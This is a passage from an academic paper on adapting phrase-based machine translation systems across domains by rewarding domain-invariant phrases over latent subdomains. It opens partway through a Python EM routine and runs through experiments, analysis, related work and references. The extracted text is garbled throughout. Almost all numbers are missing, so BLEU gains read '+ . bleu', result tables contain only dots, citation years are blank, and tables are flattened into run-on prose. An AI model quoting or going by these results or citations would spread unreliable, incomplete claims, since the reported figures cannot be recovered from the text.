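        row = [rng.random() + 1e-3 for _ in range(k)]
        s = sum(row)
        post.append([r / s for r in row])
    prior = [1.0 / k] * k
    for _ in range(iterations):
        # m-step: re-estimate the prior and the unigram models p(e | z), p(f | z)
        prior = [sum(row[z] for row in post) for z in range(k)]
        total = sum(prior)
        prior = [p / total for p in prior]
        src_counts = [defaultdict(float) for _ in range(k)]
        tgt_counts = [defaultdict(float) for _ in range(k)]
        for (e, f), row in zip(corpus, post):
            for z in range(k):
                for w in e:
                    src_counts[z][w] += row[z]
                for w in f:
                    tgt_counts[z][w] += row[z]
        def normalise(counts):
            tot = sum(counts.values()) or 1.0
            return {w: c / tot for w, c in counts.items()}
        p_src = [normalise(c) for c in src_counts]
        p_tgt = [normalise(c) for c in tgt_counts]
        # e-step: recompute p(z | e, f) for every sentence pair (in log space)
        for idx, (e, f) in enumerate(corpus):
            scores = []
            for z in range(k):
                s = math.log(prior[z])
                s += sum(math.log(p_src[z].get(w, floor)) for w in e)
                s += sum(math.log(p_tgt[z].get(w, floor)) for w in f)
                scores.append(s)
            m = max(scores)
            weights = [math.exp(s - m) for s in scores]
            norm = sum(weights)
            post[idx] = [w / norm for w in weights]
    return prior, post

the resulting per-sentence posteriors can then be pushed down to phrases with the expectation given earlier (weighting every phrase occurrence by p(z|e, f)), or, in the hard-em variant described below, by crediting only the single most probable subdomain of each sentence pair; the full model additionally trains the ibm-model-1-style alignment models with these posteriors.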
experiments

[table 1: data preparation — training-corpus sizes (numbers of sentence pairs and of words on each side) for english-french, english-spanish and english-german.]

data

we conduct experiments with large-scale smt systems across a number of domains for three language pairs (english-spanish, english-german and english-french). the datasets are summarized in table 1. for english-spanish, we run experiments with training data consisting of millions of sentence pairs collected from multiple resources within the wmt mt shared task. these include europarl (koehn, ), the common crawl corpus, the un corpus, and news commentary. for english-german, our training data consists of millions of sentence pairs collected from the wmt mt shared task, including europarl, the common crawl corpus and news commentary. finally, for english-french, we train smt systems on a corpus of millions of sentence pairs collected from the wmt mt shared task, including the french-english corpus.
we conducted experiments on different domains (tasks) where the data was manually collected by taus (https://www.taus.net/). table 2 presents the translation tasks: each of the tasks deals with a specific domain, and each task has presumably a very different relevance level to the training data. in this way, we test the stability of our results across a wide range of target domains.

[table 2: data and adaptation tasks — development and test set sizes for each domain: professional & business services and leisure, tourism and arts (english-french); professional & business services, legal and financials (english-spanish); professional & business services, legal, computer software and computer hardware (english-german).]

systems

we use a standard state-of-the-art phrase-based system. the baseline system includes the moses (koehn et al., ) baseline feature functions, plus eight hierarchical lexicalized reordering model feature functions (galley and manning, ). the training data is first word-aligned using giza++ (och and ney, ) and then symmetrized with grow(-diag)-final-and (koehn et al., ). we limit the phrase length to the maximum of seven words. the language models are interpolated n-gram models with kneser-ney smoothing, estimated by kenlm (heafield et al., ) from a large monolingual corpus of english words collected within the wmt mt shared task. finally, we use moses as a decoder (koehn et al., ).
our system is exactly the same as the baseline, plus three additional feature functions induced for the translation rules: two features for domain-specificity of phrases (both for the source side, dα(f̃), and the target side, dα(ẽ)), and one feature for source-target coherence across subdomains (d(ẽ, f̃)). for the projection, we fix the number of latent subdomains k; we also explored different values for k, but have not observed significant differences in the scores. in our experiments we do one iteration of em with the parallel lms (as described in the section on latent subdomain induction), before continuing with the full model for three more iterations. we did not observe a significant improvement from running em any longer.
finally, we use hard em, as it has been found to yield better models than the standard soft em on a number of different tasks (e.g., johnson ( )). in other words, instead of standard 'soft' em updates with phrase counts weighted according to the posterior p(z = i|e, f), we use the 'winner-takes-all' approach:

p(z = i \mid \tilde{e}) \propto \sum_{\langle e, f \rangle} c(i; \hat{z}_{\langle e, f \rangle})\, \delta(\tilde{e}; e),
p(z = i \mid \tilde{f}) \propto \sum_{\langle e, f \rangle} c(i; \hat{z}_{\langle e, f \rangle})\, \delta(\tilde{f}; f).

here, \hat{z}_{\langle e, f \rangle} is the "winning" latent subdomain for the sentence pair 〈e, f〉:

\hat{z}_{\langle e, f \rangle} = \operatorname*{argmax}_{i \in \{1, \ldots, k\}} p(z = i \mid e, f).

in practice, we found that using this hard version leads to better performance. (a more principled alternative would be to use posterior regularization (ganchev et al., ).)

alternative tuning scenarios

in order to tune all systems, we use k-best batch mira (cherry and foster, ). we report the translation accuracy with three metrics: bleu (papineni et al., ), meteor (denkowski and lavie, ) and ter (snover et al., ). we mark an improvement as significant when we obtain the p-level of % under paired bootstrap resampling (koehn, ). note that better results correspond to larger bleu and meteor but to smaller ter. for every system reported, we run the optimizer at least three times, before running multeval (clark et al., ) for resampling and significance testing. note that the scores for the systems are averages over multiple runs.

[table 3: adaptation results (bleu, meteor and ter for the baseline and our system on each task) when tuning on the in-domain development set; bold face indicates that the improvement over the baseline is significant.]
[table 4: adaptation results (bleu, meteor and ter for the baseline and our system on each task) when tuning on the mixed-domain development set; bold face indicates that the improvement over the baseline is significant.]

for tuning the systems we explore two kinds of development sets: (1) an in-domain development set of in-domain data that directly exemplifies the translation task (i.e., a sample of target-domain data), and (2) a mixed-domain development set which is a full concatenation of the development sets from all the available domains for a language pair; this scenario is a more realistic one when no in-domain data is available.
in the analysis section we also test these two scenarios against the scenario mixed-domain minus in-domain, which excludes the in-domain development set part from the mixed- domain development set. by exploring the three dif- ferent development sets we hope to shed light on the importance of having samples from the target do- main when using our features. if our features can indeed capture domain invariance of phrases then they should improve the performance in all three set- tings, including the most difficult setting where the in-domain data has been explicitly excluded from the tuning phase. . main results in-domain tuning scenario. table presents the results for the in-domain development set scenario. the integration of the domain-invariant feature functions into the baseline results in a significant improvement across all domains: average + . bleu on two adaptation tasks for english-french, + . bleu on three adaptation tasks for english- spanish and + . bleu on four adaptation tasks for english-german. mixed-domain tuning scenario. while the im- provements are robust and consistent for the in- domain development set scenario, we are espe- cially delighted to see a similar improvement for the mixed-domain tuning scenario (table ). in de- tail, we observe an average + . bleu on two adaptation tasks for english-french, + . bleu on three adaptation tasks for english-spanish and + . bleu on four adaptation tasks for english- german. we would like to emphasize that this performance improvement is obtained without tun- ing specifically for the target domain or using other domain-related meta-information in the training cor- pus. additional analysis we investigate the individual contribution of each domain-invariance feature. we conduct experiments using a basic large-scale phrase-based system de- scribed in koehn et al. ( ) as a baseline. the baseline includes two bi-directional phrase-based models (pcount(ẽ| f̃) and pcount(f̃| ẽ)), three penal- ties for word, phrase and distortion, and finally, the language model. on top of the baseline, we build four different systems, each augmented with a domain-invariance feature. the first feature is the source-target coherence feature, d(ẽ, f̃), where we use the chebyshev distance as our default options. we also investigate the performance of other metrics including the hellinger distance, and the kullback- leibler divergence. our second and third features are the domain specificity of phrases on the source dα(f̃) and on the target dα(ẽ) sides. finally, we also deploy all these three domain-invariance fea- tures dα(f̃) + dα(ẽ) + d(ẽ, f̃)). the experi- ments are conducted for the task legal on english- german. english-german (task: legal) dev system bleu↑ in- domain baseline . +d(ẽ, f̃) . /+ . +dα(ẽ) . /+ . +dα(f̃) . /+ . +dα(f̃) + dα(ẽ) + d(ẽ, f̃) . /+ . mixed- domains baseline . +d(ẽ, f̃) . /+ . +dα(ẽ) . /+ . +dα(f̃) . /+ . +dα(f̃) + dα(ẽ) + d(ẽ, f̃) . /+ . mixed- domains (exclude legal) baseline . +d(ẽ, f̃) . /+ . +dα(ẽ) . /+ . +dα(f̃) . /+ . +dα(f̃) + dα(ẽ) + d(ẽ, f̃) . /+ . table : improvements over the baseline. the bold fact indicates that the difference is statistically sig- nificant. dh(~̃e, ~̃ f) = √ √ ∑ z (√ p (z| ẽ) − √ p (z| f̃) ) . dkl(~̃e, ~̃ f) = ∑ z p (z| ẽ) log p(z| ẽ) p(z| f̃) ; dkl( ~̃ f, ~̃e) = ∑ z p (z| f̃) log p(z| f̃) p(z| ẽ) . german-english (task: legal services) input im jahr befindet der rat über die verpflichtung der elektronischen übertragung solcher aufzeichnungen. 
reference the council shall decide in on the obligation to transmit such records electronically. baseline in the council is the obligation on the electronic transfer of such records. + dα(f̃) in the council is on the obligation of electronic transfer of such records. + dα(ẽ) in the council is on the obligation of electronic transmission of such records. + d(ẽ, f̃) in the council is on the obligation of electronic transmission of such records. + all in the council is on the obligation of electronic transmission of such records. input die angemessenheit und wirksamkeit der internen verwaltungssysteme sowie die leistung der dienststellen reference for assessing the suitability and effectiveness of internal management systems and the performance of de- partments baseline the adequacy and effectiveness of internal administrative systems as well as the performance of the services + dα(f̃) the adequacy and effectiveness of the internal management systems, as well as the performance of the services + dα(ẽ) the adequacy and effectiveness of internal management systems, as well as the performance of the services + d(ẽ, f̃) the adequacy and effectiveness of the internal administrative systems as well as the performance of the services + all the adequacy and effectiveness of internal management systems, as well as the performance of the services input zur ausführung der ausgaben nimmt der anweisungsbefugte mittelbindungen vor, geht rechtliche verpflich- tungen ein reference to implement expenditure, the authorising officer shall make budget commitments and legal commitments baseline the implementation of expenditure, the authorising officer commitments before, is a legal commitments + dα(f̃) the implementation of expenditure, the authorising officer commitments, is a legal obligations + dα(ẽ) the implementation of expenditure, the authorising officer commitments before, is a legal obligations + d(ẽ, f̃) the implementation of expenditure, the authorising officer commitments before, is a legal commitments + all the implementation of expenditure, the authorising officer commitments before, is a legal obligations table : translation outputs produced by the basic baseline and its augmented systems with additional abstract feature functions derived from hidden domain information. english-german (task: legal) dev metric bleu↑ in-domain chebyshev . /+ . kullback-leibler (dkl(~̃e, ~̃ f)) . /+ . kullback-leibler (dkl( ~̃ f, ~̃e)) . /+ . hellinger . /+ . table : using different metrics as the measure of coherence. table and table present the results. overall, we can see that all domain-invariance features con- tribute to adaptation performance. specifically, we observe the following: • favouring the source-target coherence across sub- domains (i.e., adding the feature d(ẽ, f̃)) pro- vides a significant translation improvement of + . bleu. which specific similarity measure is used does not seem to matter that much (see table ). we obtain the best result (+ . bleu) with the kl divergence (dkl(~̃e, ~̃ f)). however, the differences are not statistically significant. • integrating a preference for less domain-specific translation phrases at the target side (dα(ẽ)) leads to a translation improvement of + . bleu. • doing the same for the source side (dα(f̃)), in turn, leads to an improvement of + . bleu. • augmenting the baseline by integrating all our features leads to the best result, with an improve- ment of + . bleu. 
• the translation improvement is observed also for training with a development set of mixed domains (even for the mixed-domain minus in-domain setting when excluding the legal data from the mixed development set). • the weights for all domain-invariance features, once tuned, are positive in all the experiments. table presents examples of translations from different systems. for example, the domain- invariant system revises the translation from "elec- tronic transfer" to "electronic transmission" for the english-german task baseline our system +z +z +z +z +z +z +z +z +z +z +z +z hardware . . . . . . . . . . . . . software . . . . . . . . . . . . . p&b services . . . . . . . . . . . . . legal . . . . . . . . . . . . . table : latent subdomain analysis (with bleu score). german phrase "elektronischen Übertragung", and from "internal administrative systems" to "internal management systems" for the german phrase "in- ternen verwaltungssysteme". the revisions, how- ever, are not always successful. for instance, adding dα(ẽ) and dα(f̃) resulted in revising the translation of the german phrase "rechtliche verpflichtungen" to "legal obligations", which is a worse choice (at least according to bleu) than "legal commitments" pro- duced by the baseline. we also present a brief analysis of latent subdomains induced by our projection frame- work. for each subdomain z we integrate the domain posteriors (p(z| ẽ) and p(z| f̃) and the source-target domain-coherence feature∣∣∣p(z| ẽ)−p(z| f̃) ∣∣∣). we hypothesize that when- ever we observe an improvement for a translation task with domain-informed features, this means that the corresponding latent subdomain z is close to the target translation domain. the results are presented in table . apparently, among the latent subdomains, z , z , z , z are closest to the target domain of hardware. their derived feature functions are helpful in improving the translation accuracy for the task. similarly, z , z , z , z , z and z are closest to professional & business, z is closest to software, and z is closest to legal. meanwhile, z , z and z are not relevant to the task of software. similarly, z is not relevant to professional & business, and z , z and z are not relevant to legal. using topic models instead of latent domains. our domain-invariance framework demands access to posterior distributions of latent domains for phrases. though we argued for using our domain induction approach, other latent variable models can be used to compute these posteriors. one natural option is to use topic models, and more specifically lda (blei et al., ). will our domain-invariance framework still work with topic models, and how closely related are the induced latent domains induced with lda and our model? these are the questions we study in this section. we estimate lda at the sentence level in a mono- lingual regime on one side of each parallel corpus (let us assume for now that this is the source side). when the model is estimated, we obtain the pos- terior distributions of topics (we denote them as z, as we treat them as domains) for each source-side sentence in the training set. now, as we did with our phrase induction framework, we associate these posteriors with every phrase both in the source and in the target sides of that sentence pair. phrase and phrase-pair features defined in section are com- puted relying on these probabilities averaged over the entire training set. 
we try both directions, that is also estimating lda on the target side and transfer- ring the posterior probabilities to the source side. in order to estimate lda, we used gibbs sam- pling implemented in the mallet package (mccal- lum, ) with default values of hyper-parameters (α = . and β = . ). table presents the results for the legal task with three different sys- tem optimization settings. bleu, meteor and ter are reported. as the result suggests, using our induction framework tends to yield slightly better translation results in terms of meteor and espe- cially bleu. however, using lda seems to lead to slightly better translation result in terms of ter. topics in lda-like models encode co-occurrence patterns in bag-of-word representations of sen- tences. in contrast, domains in our domain- induction framework rely on ngrams and word- alignment information. consequently, these mod- note that bilingual lda models (e.g., see hasler et al. ( ), zhang et al. ( )) could potentially produce better results but we leave them for future work. english-german (task: legal) dev algorithms bleu↑ meteor↑ ter↓ in-domain our . . . lda (source) . . . lda (target) . . . mixed-domains our . . . lda (source) . . . lda (target) . . . mixed-domains (exclude legal) our . . . lda (source) . . . lda (target) . . . table : comparison in latent domain induction with various algorithms. els are likely to encode different latent information about sentences. we also investigate translation per- formance when we use both coherence features from lda and coherence features from our own frame- work. table shows that using all the induced co- herence features results in the best translation, no matter which translation metric is used. we leave the exploration of such an extension for future work. english-german (task: legal) dev algorithms bleu↑ meteor↑ ter↓ mixed domains our features . . . lda (source) features . . . all features . . . table : combination of all features. related work and discussion domain adaptation is an important challenge for many nlp problems. a good survey of potential translation errors in mt adaptation can be found in irvine et al ( ). lexical selection appears to be the most common source of errors in domain adap- tation scenarios (irvine et al., ; wees et al., ). other translation errors include reordering errors (chen et al., a; zhang et al., ), align- ment errors (cuong and sima’an, ) and overfit- ting to the source domain at the parameter tuning stage (joty et al., ). adaptation in smt can be regarded as injecting prior knowledge about the target translation task into the learning process. various approaches have so far been exploited in the literature. they can be loosely categorized according to the type of prior knowledge exploited for adaptation. often, a seed in-domain corpus exemplifying the target translation task is used as a form of prior knowledge. various techniques can then be used for adaptation. for ex- ample, one approach is to combine a system trained on the in-domain data with another general-domain system trained on the rest of the data (e.g., see koehn and schroeder ( ), foster et al. ( ), bisazza et al. ( ), sennrich ( b), razmara et al. ( ), sennrich et al. ( ), haddow ( ), joty et al. ( )). rather than using the entire training data, it is also common to combine the in-domain system with a system trained on a selected subset of the data (e.g., see axelrod et al. ( ), koehn and haddow ( ), duh et al. ( ), kirchhoff and bilmes ( ), cuong and sima’an ( b)). 
in some other cases, the prior knowledge lies in meta-information about the training data. this could be document-annotated training information (eidel- man et al., ; hu et al., ; hasler et al., ; su et al., ; zhang et al., ), and domain- annotated sub-corpora (chiang et al., ; sen- nrich, b; chen et al., b; carpuat et al., ; cuong and sima’an, ). some recent ap- proaches perform adaptation by exploiting a target domain development, or even only the source side of the development set (sennrich, a; carpuat et al., ; carpuat et al., ; mansour and ney, ). recently, there was some research on adapting si- multaneously to multiple domains, the goal related to ours (clark et al., ; sennrich, a). for instance, clark et al. ( ) augment a phrase-based mt system with various domain indicator features to build a single system that performs well across a range of domains. sennrich ( a) proposed to cluster training data in an unsupervised fashion to build mixture models that yield good performance on multiple test domains. however, their approaches are very different from ours, that is minimizing risk associated with choosing domain-specific transla- tions. moreover, the present work deviates radically from earlier work in that it explores the scenario where no prior data or knowledge is available about the translation task during training time. the focus of our approach is to aim for safer translation by re- warding domain-invariance of translation rules over latent subdomains that can be (still) useful on adap- tation tasks. the present study is inspired by zhang et al. ( ) which exploits topic-insensitivity that is learned over documents for translation. the goal and setting we are working on is markedly differ- ent (i.e., we do not have access to meta-information about the training and translation tasks at all). the domain-invariance induced is integrated into smt systems as feature functions, redirecting the decoder to a better search space for the translation over adap- tation tasks. this aims at biasing the decoder to- wards translations that are less domain-specific and more source-target domain coherent. there is an interesting relation between this work and extensive prior work on minimum bayes risk (mbr) objectives (used either at test time (kumar and byrne, ) or during training (smith and eis- ner, ; pauls et al., )). as with our work, the goal of mbr minimization is to select transla- tions that are less “risky". their risk is due to the uncertainty in model predictions, and some of this uncertainty may indeed be associated with domain- variability of translations. still, a system trained with an mbr objective will tend to output most frequent translation rather than the most domain- invariant one, and this, as we argued in the introduc- tion, might not be the right decision when applying it across domains. we believe that the two classes of methods are largely complementary, and leave fur- ther investigation for future work. at a conceptual level it is also related to regular- izers used in learning domain-invariant neural mod- els (titov, ), specifically autoencoders. though they also consider divergences between distributions of latent variable vectors, they use these divergences at learning time to bias models to induce represen- tations maximally invariant across domains. more- over, they assume access to meta-information about domains and consider only classification problems. 
conclusion this paper aims at adapting machine translation sys- tems to all domains at once by favoring phrases that are domain-invariant, that are safe to use across a variety of domains. while typical domain adapta- tion systems expect a sample of the target domain, our approach does not require one and is directly applicable to any domain adaptation scenario. ex- periments show that the proposed approach results in modest but consistent improvements in bleu, meteor and ter. to the best of our knowledge, our results are the first to suggest consistent and sig- nificant improvement by a fully unsupervised adap- tation method across a wide variety of translation tasks. the proposed adaptation framework is fairly sim- ple, leaving much space for future research. one potential direction is the introduction of additional features relying on the assignment of phrases to do- mains. the framework for inducing latent domains proposed in this paper should be beneficial in this future work. the implementation of our subdomain- induction framework is available at https:// github.com/hoangcuong /udit. acknowledgements we thank anonymous reviewers for their construc- tive comments on earlier versions. we also thank hui zhang for his help on expected kneser-ney smoothing technique. the first author is supported by the expert (exploiting empirical approaches to translation) initial training network (itn) of the european union’s seventh framework programme. the second author is supported by vici grant nr. - - from the netherlands organization for scientific research (nwo). we thank taus for providing us with suitable data. references amittai axelrod, xiaodong he, and jianfeng gao. . domain adaptation via pseudo in-domain data selec- tion. in proceedings of emnlp. arianna bisazza, nick ruiz, and marcello federico. . fill-up versus interpolation methods for phrase- based smt adaptation. in iwslt. david m. blei, andrew y. ng, and michael i. jordan. . latent dirichlet allocation. jmlr. peter f. brown, vincent j. della pietra, stephen a. della pietra, and robert l. mercer. . the mathemat- ics of statistical machine translation: parameter esti- mation. comput. linguist. marine carpuat, hal daume iii, katharine henry, ann irvine, jagadeesh jagarlamudi, and rachel rudinger. . sensespotting: never let your parallel data tie you to an old domain. in proceedings of acl. marine carpuat, cyril goutte, and george foster. . linear mixture models for robust machine translation. in proc. of wmt. boxing chen, george foster, and roland kuhn. a. adaptation of reordering models for statistical ma- chine translation. in proceedings of naacl. boxing chen, roland kuhn, and george foster. b. vector space model for adaptation in statistical ma- chine translation. in proceedings of the acl. colin cherry and george foster. . batch tuning strategies for statistical machine translation. in pro- ceedings of the naacl-hlt. david chiang, steve deneefe, and michael pust. . two easy improvements to lexical weighting. in pro- ceedings of acl (short papers). jonathan clark, chris dyer, alon lavie, and noah a. smith. . better hypothesis testing for statistical machine translation: controlling for optimizer insta- bility. in proceedings of acl (short papers). jonathan clark, alon lavie, and chris dyer. . one system, many domains: open-domain statistical ma- chine translation via feature augmentation. trevor cohn and gholamreza haffari. . an infinite hierarchical bayesian model of phrasal translation. in proceedings of the acl. 
hoang cuong and khalil sima’an. a. latent do- main phrase-based models for adaptation. in proceed- ings of emnlp. hoang cuong and khalil sima’an. b. latent do- main translation models in mix-of-domains haystack. in proceedings of coling. hoang cuong and khalil sima’an. . latent domain word alignment for heterogeneous corpora. in pro- ceedings of naacl-hlt. arthur dempster, nan laird, and donald rubin. . maximum likelihood from incomplete data via the em algorithm. jrss, series b, ( ): – . john denero, dan gillick, james zhang, and dan klein. . why generative phrase models underperform surface heuristics. in proc. of wmt. michael denkowski and alon lavie. . meteor . : automatic metric for reliable optimization and evalua- tion of machine translation systems. in proc. of wmt. kevin duh, graham neubig, katsuhito sudoh, and ha- jime tsukada. . adaptation data selection us- ing neural language models: experiments in machine translation. in proceedings of the acl. vladimir eidelman, jordan boyd-graber, and philip resnik. . topic models for dynamic translation model adaptation. in acl (short papers). george foster, cyril goutte, and roland kuhn. . discriminative instance weighting for domain adapta- tion in statistical machine translation. in proceedings of emnlp. michel galley and christopher d. manning. . a simple and effective hierarchical phrase reordering model. in proceedings of emnlp. kuzman ganchev, ben taskar, fernando pereira, and jo ao gama. . posterior vs parameter sparsity in latent variable models. in proceedings of nips. barry haddow. . applying pairwise ranked optimi- sation to improve the interpolation of translation mod- els. in proceedings of naacl-hlt. eva hasler, phil blunsom, philipp koehn, and barry haddow. . dynamic topic adaptation for phrase- based mt. in proceedings of eacl. kenneth heafield, ivan pouzyrevsky, jonathan clark, and philipp koehn. . scalable modified kneser-ney language model estimation. in proceedings of the acl (volume : short papers). yuening hu, ke zhai, vladimir eidelman, and jordan boyd-graber. . polylingual tree-based topic models for translation domain adaptation. in proceed- ings of the acl. ann irvine, john morgan, marine carpuat, daume hal iii, and dragos munteanu. . measuring machine translation errors in new domains. in tacl. mark johnson. . why doesn’t em find good hmm pos-taggers? in proceedings of emnlp-conll. shafiq joty, hassan sajjad, nadir durrani, kamla al- mannai, ahmed abdelali, and stephan vogel. . how to avoid unwanted pregnancies: domain adapta- tion using neural network models. in proceedings of emnlp. katrin kirchhoff and jeff bilmes. . submodularity for data selection in machine translation. in emnlp. philipp koehn and barry haddow. . towards effec- tive use of training data in statistical machine transla- tion. in proceedings of the wmt. philipp koehn and josh schroeder. . experiments in domain adaptation for statistical machine translation. in proceedings of wmt. philipp koehn, franz och, and daniel marcu. . statistical phrase-based translation. in proceedings of naacl. philipp koehn, hieu hoang, alexandra birch, chris callison-burch, marcello federico, nicola bertoldi, brooke cowan, wade shen, christine moran, richard zens, chris dyer, ondřej bojar, alexandra con- stantin, and evan herbst. . moses: open source toolkit for statistical machine translation. in proceed- ings of acl. philipp koehn. . statistical significance tests for machine translation evaluation. in proceedings of emnlp. philipp koehn. . 
europarl: a parallel corpus for statistical machine translation. in proceedings of mtsummit. shankar kumar and william j. byrne. . minimum bayes-risk decoding for statistical machine translation. in hlt-naacl. saab mansour and hermann ney. . unsupervised adaptation for statistical machine translation. in pro- ceedings of wmt. spyros matsoukas, antti-veikko i. rosti, and bing zhang. . discriminative corpus weight esti- mation for machine translation. in proceedings of emnlp. andrew kachites mccallum. . mal- let: a machine learning for language toolkit. http://mallet.cs.umass.edu. markos mylonakis and khalil sima’an. . phrase translation probabilities with itg priors and smoothing as learning objective. in proceedings of emnlp. graham neubig, taro watanabe, eiichiro sumita, shin- suke mori, and tatsuya kawahara. . an unsuper- vised model for joint phrase alignment and extraction. in proceedings of acl-hlt. franz och and hermann ney. . a systematic com- parison of various statistical alignment models. com- put. linguist., pages – . franz och and hermann ney. . the alignment tem- plate approach to statistical machine translation. com- put. linguist., pages – . kishore papineni, salim roukos, todd ward, and wei- jing zhu. . bleu: a method for automatic evalu- ation of machine translation. in proceedings of acl. adam pauls, john denero, and dan klein. . con- sensus training for consensus decoding in machine translation. in proceedings of emnlp. majid razmara, george foster, baskaran sankaran, and anoop sarkar. . mixing multiple translation models in statistical machine translation. in proceed- ings of acl. rico sennrich, holger schwenk, and walid aransa. . a multi-domain translation model framework for statistical machine translation. in proceedings of acl. rico sennrich. a. mixture-modeling with unsuper- vised clusters for domain adaptation in statistical ma- chine translation. in proceedings of the eamt. rico sennrich. b. perplexity minimization for translation model domain adaptation in statistical ma- chine translation. in proceedings of eacl. david a. smith and jason eisner. . minimum risk annealing for training log-linear models. in proceed- ings of the coling/acl. matthew snover, bonnie dorr, r. schwartz, l. micciulla, and j. makhoul. . a study of translation edit rate with targeted human annotation. in proceedings of amta. jinsong su, deyi xiong, yang liu, xianpei han, hongyu lin, junfeng yao, and min zhang. . a context- aware topic model for statistical machine translation. in proceedings of the acl-ijcnlp. ivan titov. . domain adaptation by constraining inter-domain variability of latent feature representa- tion. in proceedings of acl. marlies van der wees, arianna bisazza, wouter weerkamp, and christof monz. . what’s in a domain? analyzing genre and topic differences in smt. in proceedings of acl-ijcnlp (short paper). hui zhang and david chiang. . kneser-ney smoothing on expected counts. in proceedings of acl. min zhang, xinyan xiao, deyi xiong, and qun liu. . topic-based dissimilarity and sensitivity mod- els for translation rule selection. jair. biao zhang, jinsong su, deyi xiong, hong duan, and junfeng yao. . discriminative reordering model adaptation via structural learning. in ijcai.